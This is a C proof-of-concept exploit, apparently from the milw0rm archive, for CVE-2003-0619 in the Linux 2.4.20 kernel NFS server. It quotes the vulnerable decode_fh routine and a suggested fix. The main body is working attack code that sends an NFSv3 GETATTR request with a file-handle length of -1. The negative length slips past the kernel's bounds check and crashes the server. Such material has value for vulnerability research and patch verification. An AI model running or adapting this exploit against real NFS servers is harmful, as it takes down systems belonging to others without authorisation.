
Linux Kernel 2.4.20 - 'decode_fh' Denial of Service - CVE-2003-0619

  1. /*
  2.   Linux 2.4.20 knfsd kernel signed/unsigned decode_fh DoS
  3.   Author: jared stanbrough <jareds pdx edu>
  4.  
  5.   Vulnerable code: (fs/nfsd/nfs3xdr.c line 52-64)
  6.  
  7.   static inline u32 *
  8.   decode_fh(u32 *p, struct svc_fh *fhp)
  9.   {
  10.         int size;
  11.         fh_init(fhp, NFS3_FHSIZE);
  12.         size = ntohl(*p++);
  13.         if (size > NFS3_FHSIZE)
  14.                 return NULL;  
  15.  
  16.         memcpy(&fhp->fh_handle.fh_base, p, size);
  17.         fhp->fh_handle.fh_size = size;
  18.         return p + XDR_QUADLEN(size);
  19.   }
  20.  
  21.   This code is called by quite a few XDR decoding routines. The below
  22.   POC demonstrates the vulnerability by encoding a malicious fhsize
  23.   at the beginning of a diroparg xdr argument.
  24.  
  25.   To test this, the vulnerable host must have an accessible exported
  26.   directory which was previously mounted by the attacker. _HOWEVER_
  27.   it may be possible to trigger this bug by some other method.
  28.  
  29.   Fix: declare size as an unsigned int, or additionally reject size < 0, so that a negative length can no longer slip past the NFS3_FHSIZE bound check and reach memcpy.
  30. */
  31.  
  32. #include <rpcsvc/nfs_prot.h>
  33. #include <rpc/rpc.h>
  34. #include <rpc/xdr.h>
  35. #include <netinet/in.h>
  36. #include <sys/socket.h>
  37. #include <sys/types.h>
  38.  
  39. #define NFSPROG 100003
  40. #define NFSVERS 3
  41. #define NFSPROC_GETATTR 1
  42.  
/* Argument object handed to clnt_call.  xdr_heh never reads it, so its
 * contents are irrelevant; static storage keeps it zero-initialized. */
static struct diropargs heh = {0};
  44.  
/*
 * XDR encoder used in place of the real diropargs encoder.
 *
 * The diropargs argument is ignored.  The only thing written to the XDR
 * stream is one int32 holding -1, i.e. the first word that the server's
 * decode_fh (see the header comment) interprets as the file-handle size.
 *
 * Returns the result of xdr_int32_t (TRUE on success, FALSE otherwise).
 */
bool_t xdr_heh(XDR *xdrs, diropargs *heh)
{
  (void)heh;                       /* intentionally unused */
  int32_t length_word = -1;        /* negative on purpose; see header */
  bool_t encoded = xdr_int32_t(xdrs, &length_word);
  return encoded;
}
  50.  
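/*
 * Entry point: sends a single NFSv3 GETATTR request over UDP whose
 * argument is encoded by xdr_heh (one negative length word) to the host
 * name the original author hard-coded ("marduk").  Any reply is decoded
 * as void and discarded.
 *
 * Returns 0 on completion, 1 if the RPC client could not be created.
 */
int main(void)
{
  CLIENT *client = clnt_create("marduk", NFSPROG, NFSVERS, "udp");

  /* clnt_create does not set errno, so the original perror() printed an
   * unrelated message; clnt_pcreateerror reports the actual RPC reason.
   * The early return is required: the original fell through and
   * dereferenced the NULL client on the cl_auth assignment below. */
  if (client == NULL) {
    clnt_pcreateerror("clnt_create");
    return 1;
  }

  client->cl_auth = authunix_create_default();

  /* Per-call timeout.  A server that stops responding after this request
   * yields RPC_TIMEDOUT rather than RPC_SUCCESS; that is reported, not
   * treated as a client-side failure. */
  struct timeval tv = { .tv_sec = 3, .tv_usec = 0 };

  if (clnt_call(client, NFSPROC_GETATTR, (xdrproc_t) xdr_heh, (char *)&heh,
                (xdrproc_t) xdr_void, NULL, tv) != RPC_SUCCESS) {
    clnt_perror(client, "clnt_call");
  }

  /* Release the auth handle and the client (socket) before exiting. */
  auth_destroy(client->cl_auth);
  clnt_destroy(client);

  return 0;
}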
  71.  
  72. // milw0rm.com [2003-07-29]